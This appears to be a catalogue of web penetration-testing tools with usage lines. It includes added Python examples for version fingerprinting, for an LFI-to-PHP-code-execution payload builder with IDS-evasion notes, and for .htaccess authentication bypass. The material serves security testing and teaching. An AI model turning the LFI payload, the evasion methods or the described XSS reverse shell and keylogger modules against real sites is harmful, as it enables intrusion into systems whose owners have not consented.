Web

Anything related to websites

Halcyon

Generates Kolkata fingerprints for web application identification.
Halcyon is a repository crawler that checksums the static files found in a given git repository. It first performs a change-frequency analysis, then records checksums starting with the static files that are updated most often and works its way down from there. From the checksum data it generates well-formed version fingerprint signatures in YML format that can be fed straight into Kolkata. The signature output also includes the revision ID, so it may be possible to pin down the exact commit of the application instance under test.

Dependencies:
git

Usage:
The application may be time-intensive, depending on the number of files that need to be checksummed and the number of revisions they have.

usage: halcyon.py [-h] [-c] -u URL -f FILE -m MATCH
                  [--omit-directory OMIT_DIRECTORY] [-t TOP]

optional arguments:
  -h, --help            show this help message and exit
  -c, --clone           Clone the repo first.
  -u URL, -p URL, --url URL, --path URL
                        Path or URL to the repository.
  -f FILE, --file FILE  File to search for version information
  -m MATCH, --match MATCH
                        Regex to match line with version number (ie: '^\\\$wp_version = \x27([^']+)\x27;$')
  --omit-directory OMIT_DIRECTORY
                        Comma separated list of directories to omit. (Helpful for removing install directories from signature generation)
  -t TOP, --top TOP     Top 'n' most-frequently-edited files to use. (0 for unlimited)

Example:
python2 halcyon.py -u https://github.com/WordPress/WordPress.git -c -f wp-version.php -m "^\\\$wp_version = \x27([^']+)\x27;$" -t 1

Vanguard

Vanguard is an extensible utility with module support built for testing different types of web exploitation on a given domain.
Features

Main application features:
Fully Configurable
Web crawlers crawl every open HTTP and HTTPS port reported by nmap
LibWhisker2 for HTTP IDS evasion (same options as nikto)
Tests via GET, POST, and COOKIE

Web penetration tests:
SQL injection (this test is signature-free)
LDAP Injection
XSS
File inclusion
Command Injection

Usage:
perl scan.pl -h [hostname] -e [evasion option]

Application Dependencies:

Notice: You must run this application as root.
You must have nmap (http://nmap.org) installed for this application to run correctly.
Protip: You can drop the root requirement by removing the check for root and modifying the nmap configuration it uses.

Perl Dependencies:
LibWhisker2 requires Net::SSLeay. You may need to get this from cpan, compile it in, or install it from your distribution's package manager.
YAML
Clone
Notice: You can install these libraries with cpan.

Kolkata

Kolkata is a web application fingerprinting engine written in Perl that combines cryptographic checksums with IDS evasion. Kolkata uses session splicing for IDS evasion and configurable checksums of static files to determine the version of a web application.

Dependencies
LibWhisker2 - This comes bundled in the tarball, and also ships with nikto and a variety of other tools on this site.
YAML::XS - Install with cpan in bash (cpan -i YAML::XS)

Usage
kolkata.pl -d domain.tld [-v -p [remote_path_to_web_application]]

kolkata requires a directory called sigs in its own directory.
The sigs directory must contain properly formatted yml files with checksums, such as those generated by Halcyon.
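As an added illustration of the checksum-based approach that Halcyon and Kolkata share (example code, not part of either tool; the release data is constructed, and the signature shape is an assumed Python dictionary rather than Kolkata's actual YML schema), the following ranks static files by how often their checksums change between releases, keeps the top-n as signature files, and matches checksums observed on a target against those signatures:

```python
import hashlib
from collections import Counter

# Constructed stand-in for the git history Halcyon walks: release tag -> {static path: bytes}.
# Insertion order is release order (oldest first).
RELEASES = {
    "1.0": {"js/app.js": b"var v=1;",   "css/site.css": b"body{}",         "img/logo.png": b"PNG0"},
    "1.1": {"js/app.js": b"var v=1.1;", "css/site.css": b"body{}",         "img/logo.png": b"PNG0"},
    "2.0": {"js/app.js": b"var v=2;",   "css/site.css": b"body{margin:0}", "img/logo.png": b"PNG0"},
}


def checksum(data: bytes) -> str:
    # Any stable digest works: the fingerprint only has to tell known releases
    # apart, it does not need to resist forgery.
    return hashlib.sha256(data).hexdigest()


def change_frequency(releases: dict) -> Counter:
    """Count, per path, how many consecutive-release transitions changed its checksum."""
    tags = list(releases)
    changes = Counter()
    for prev, cur in zip(tags, tags[1:]):
        for path, data in releases[cur].items():
            if path in releases[prev] and checksum(releases[prev][path]) != checksum(data):
                changes[path] += 1
    return changes


def build_signatures(releases: dict, top: int = 0) -> dict:
    """Return {release: {path: checksum}} using the top-n most often changed files.

    top=0 keeps every file that changed at least once.  Files that never change
    (img/logo.png above) are dropped: they cannot distinguish one release from another.
    """
    ranked = [path for path, _ in change_frequency(releases).most_common()]
    if top:
        ranked = ranked[:top]
    return {
        tag: {path: checksum(files[path]) for path in ranked if path in files}
        for tag, files in releases.items()
    }


def fingerprint(observed: dict, signatures: dict) -> list:
    """Releases consistent with every observed checksum that appears in their signature.

    `observed` is {path: checksum} as fetched from the target.  A release is a
    candidate only if at least one of its signature files was observed and none
    of the observed ones disagree, so an unreachable file never rules a release out.
    """
    candidates = []
    for tag, sig in signatures.items():
        shared = [path for path in sig if path in observed]
        if shared and all(observed[path] == sig[path] for path in shared):
            candidates.append(tag)
    return candidates


if __name__ == "__main__":
    sigs = build_signatures(RELEASES)
    print(change_frequency(RELEASES).most_common())
    # A target serving the 1.1 assets is identified exactly...
    print(fingerprint({p: checksum(d) for p, d in RELEASES["1.1"].items()}, sigs))
    # ...but a low-churn file alone (css is unchanged between 1.0 and 1.1) only narrows it down.
    print(fingerprint({"css/site.css": checksum(b"body{}")}, sigs))
```

The second fingerprint call is the caveat that matters in practice: the fewer high-churn files a target exposes (or the more of them a deployment has minified or rewritten), the wider the candidate set Kolkata can return.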

lfi_autopwn.pl

This script attempts to gain code execution on sites vulnerable to local file inclusion, either through the httpd error log or by setting a crafted User-Agent and then including a file that contains the process's environment variables. PHP code execution is confirmed with an arithmetic challenge, and the script uses system() as its PHP execution function. Because every part of this process is randomized, including the math challenge, signature-based detection is defeated, while LibWhisker provides IDS evasion.

Features
Signature-free
Session Splicing
User-Agent and Log injection
Arithmetic Test

Usage
perl lfi_autopwn.pl -h www.vuln.tld -u "/vuln.ext?page=main&foo=bar" -i page
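As an added example of the verification step described above (not code from lfi_autopwn.pl; the log and environment-file paths are assumptions, the HTTP responses are constructed, and nothing is sent over the network), the following Python builds a randomized arithmetic challenge, wraps it in the PHP that would be planted through the User-Agent header, and then checks a response body for the computed answer rather than for the payload text, so a server that merely reflects the log line is not mistaken for one that executed it:

```python
import random
import re
import string
from urllib.parse import urlencode

# Where the poisoned User-Agent ends up.  Both paths are assumptions for the example;
# real targets vary by distribution and httpd configuration.
INCLUDE_TARGETS = ("/proc/self/environ", "/var/log/apache2/error.log")


def make_challenge(rng=random):
    """Two random operands and a random alphabetic marker; nothing here repeats between runs."""
    a, b = rng.randint(1000, 99999), rng.randint(1000, 99999)
    marker = "".join(rng.choice(string.ascii_letters) for _ in range(12))
    return a, b, marker


def build_payload(a, b, marker):
    """PHP that prints the sum between two copies of the marker.

    The marker is letters only, so the digits between them are unambiguous,
    and the sum only appears if the interpreter actually evaluated the code.
    """
    return f"<?php echo '{marker}' . ({a} + {b}) . '{marker}'; ?>"


def poison_request(base_url, payload):
    """Request whose User-Agent lands in the error log / process environment."""
    return {"method": "GET", "url": base_url, "headers": {"User-Agent": payload}}


def include_requests(base_url, param, extra_params=None):
    """One request per inclusion target, with the vulnerable parameter pointed at it."""
    reqs = []
    for target in INCLUDE_TARGETS:
        qs = dict(extra_params or {})
        qs[param] = target
        reqs.append({"method": "GET", "url": f"{base_url}?{urlencode(qs)}", "headers": {}})
    return reqs


def check_execution(body, a, b, marker):
    """True only if the body carries marker<digits>marker with the correct sum."""
    m = re.search(re.escape(marker) + r"(\d+)" + re.escape(marker), body)
    return m is not None and int(m.group(1)) == a + b


if __name__ == "__main__":
    a, b, marker = make_challenge()
    payload = build_payload(a, b, marker)
    print(poison_request("http://www.vuln.tld/vuln.ext", payload))
    for r in include_requests("http://www.vuln.tld/vuln.ext", "page", {"foo": "bar"}):
        print(r["url"])
    # Constructed responses: one where PHP ran the planted code, one where the log
    # line was only echoed back as text (LFI confirmed, but no code execution).
    executed = f"<html>...HTTP_USER_AGENT={marker}{a + b}{marker}...</html>"
    reflected = f"<html>...HTTP_USER_AGENT={payload}...</html>"
    print(check_execution(executed, a, b, marker), check_execution(reflected, a, b, marker))
```

The reflected case is the one that trips naive checks: the included file does contain the payload, which proves the inclusion but not that PHP parsed it. Only the appearance of the sum proves execution, and because operands and marker change on every run there is no constant string for an IDS to match.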

OWASP Xenotix XSS Exploit Framework

OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It claims zero-false-positive scan results from its unique triple browser engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world's second largest collection of XSS payloads, about 1500+ distinct payloads for effective XSS vulnerability detection and WAF bypass. It incorporates a feature-rich information gathering module for target reconnaissance. The tool supports both a manual mode and automated, time-sharing based test modes. The exploitation framework includes an XSS encoder, a victim-side XSS keystroke logger, an executable drive-by downloader and an XSS reverse shell, together with highly offensive XSS exploitation modules for penetration testing and proof-of-concept creation.

htexploit

HTExploit (HiperText access Exploit) is an open-source tool written in Python that exploits a weakness in the way .htaccess files can be configured to protect a web directory with an authentication process. Using it, anyone can list the contents of a directory protected this way, bypassing the authentication process.
The tool is modular, allowing the tester to run a full analysis of the protected website for the following attacks: SQL injection, local file inclusion, remote file inclusion and others.
Its main characteristic is that all of the analyses are performed inside the protected directory, not from the publicly accessible site.

Features:
x Multiple modules to execute.
x Save the output to a specified directory.
x HTML reporting.
x Use multiple wordlists to probe for .htaccess bypasses.
x Verbose mode for fully detailed information.
x Recursive crawling engine.

$ python htexploit

[HTExploit ASCII-art banner, v0.77]

Usage: htexploit -u [URL] [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     **REQUIRED** - Specify the URL to scan
  -o OUTPUT, --output=OUTPUT
                        Specify the output directory (Default: Random)
  -w WORDLIST, --wordlist=WORDLIST
                        Specify the wordlist to use (Default: 'res/FullList')
  -v, --verbose         Verbosity level (Default: 0)

Example Usage:
python htexploit -u somesite.com -w somewordlist_not_included -o folder_to_output
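The configuration weakness behind this class of bypass is an .htaccess that places its auth directives inside a <Limit GET POST> block: Apache applies a Require inside <Limit> only to the listed methods (treating HEAD as GET), so a request using any other method never hits the authentication check. As an added example (not HTExploit's own code; both .htaccess fragments are constructed), the following Python parses an .htaccess, works out which probe methods a Require directive actually covers, and lists the methods that would reach the directory unauthenticated; the corrected fragment puts Require outside any <Limit> so it covers every method:

```python
import re

# Constructed .htaccess fragments.  WEAK scopes authentication to GET and POST only;
# FIXED applies the same Require regardless of method.
WEAK = """\
AuthType Basic
AuthName "Restricted"
AuthUserFile /var/www/.htpasswd
<Limit GET POST>
    Require valid-user
</Limit>
"""

FIXED = """\
AuthType Basic
AuthName "Restricted"
AuthUserFile /var/www/.htpasswd
Require valid-user
"""

OPEN = re.compile(r"^<(Limit|LimitExcept)\s+([^>]+)>$", re.I)
CLOSE = re.compile(r"^</(Limit|LimitExcept)>$", re.I)
# Any Require other than "Require all granted" restricts access.
AUTH_REQUIRE = re.compile(r"^Require\s+(?!all\s+granted\b)\S", re.I)

# Methods to probe.  XYZZY stands in for an arbitrary, non-standard method name.
DEFAULT_PROBES = ("GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "PROPFIND", "XYZZY")


def _methods(spec: str) -> set:
    methods = {m.upper() for m in spec.split()}
    if "GET" in methods:
        methods.add("HEAD")  # Apache treats HEAD as GET inside <Limit>/<LimitExcept>
    return methods


def auth_bypass_methods(htaccess: str, probes=DEFAULT_PROBES) -> list:
    """Probe methods that no Require directive in `htaccess` applies to."""
    probes = set(probes)
    covered = set()
    scope = None  # None at top level, else ("limit" | "limitexcept", methods)
    for raw in htaccess.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = OPEN.match(line)
        if m:
            scope = (m.group(1).lower(), _methods(m.group(2)))
            continue
        if CLOSE.match(line):
            scope = None
            continue
        if AUTH_REQUIRE.match(line):
            if scope is None:
                covered |= probes                  # applies to every method
            elif scope[0] == "limit":
                covered |= probes & scope[1]       # only the listed methods
            else:
                covered |= probes - scope[1]       # everything but the listed methods
    return sorted(probes - covered)


if __name__ == "__main__":
    print("WEAK  bypassable via:", auth_bypass_methods(WEAK))
    print("FIXED bypassable via:", auth_bypass_methods(FIXED))
```

The <LimitExcept> case is included because it is the mirror-image mistake: <LimitExcept GET POST> protects every method except the two that browsers actually use. The safe pattern for authentication is simply a bare Require at directory level, reserving <Limit> and <LimitExcept> for method-specific rules layered on top of it.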

webvulscan

WebVulScan is a web application vulnerability scanner. It is a web application itself written in PHP and can be used to test remote, or local, web applications for security vulnerabilities. As a scan is running, details of the scan are dynamically updated to the user. These details include the status of the scan, the number of URLs found on the web application, the number of vulnerabilities found and details of the vulnerabilities found.

After a scan is complete, a detailed PDF report is emailed to the user. The report includes descriptions of the vulnerabilities found, recommendations and details of where and how each vulnerability was exploited.

The vulnerabilities tested by WebVulScan are:

Reflected Cross-Site Scripting
Stored Cross-Site Scripting
Standard SQL Injection
Broken Authentication using SQL Injection
Autocomplete Enabled on Password Fields
Potentially Insecure Direct Object References
Directory Listing Enabled
HTTP Banner Disclosure
SSL Certificate not Trusted
Unvalidated Redirects

Features:

Crawler: Crawls a website to identify and display all URLs belonging to the website.
Scanner: Crawls a website and scans all URLs found for vulnerabilities.
Scan History: Allows a user to view or download PDF reports of previous scans that they performed.
Register: Allows a user to register with the web application.
Login: Allows a user to login to the web application.
Options: Allows a user to select which vulnerabilities they wish to test for (all are enabled by default).
PDF Generation: Dynamically generates a detailed PDF report.
Report Delivery: The PDF report is emailed to the user as an attachment.

Watcher

Watcher is a Fiddler addon which aims to assist penetration testers in passively finding Web-application vulnerabilities. The security field today has several good choices for HTTP proxies which assist auditors and pen-testers. We chose to implement this as a plugin for Fiddler which already provides the proxy framework for HTTP debugging.

Recon-ng

Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built-in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.

Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng!

Silverlight Spy

Silverlight Spy is a runtime inspector tool providing unprecedented access to all aspects of any Silverlight in-browser, out-of-browser and Windows Phone 7 application. Explore the UI element tree, monitor events, extract XAML, interactively execute DLR code, view statistics and more.
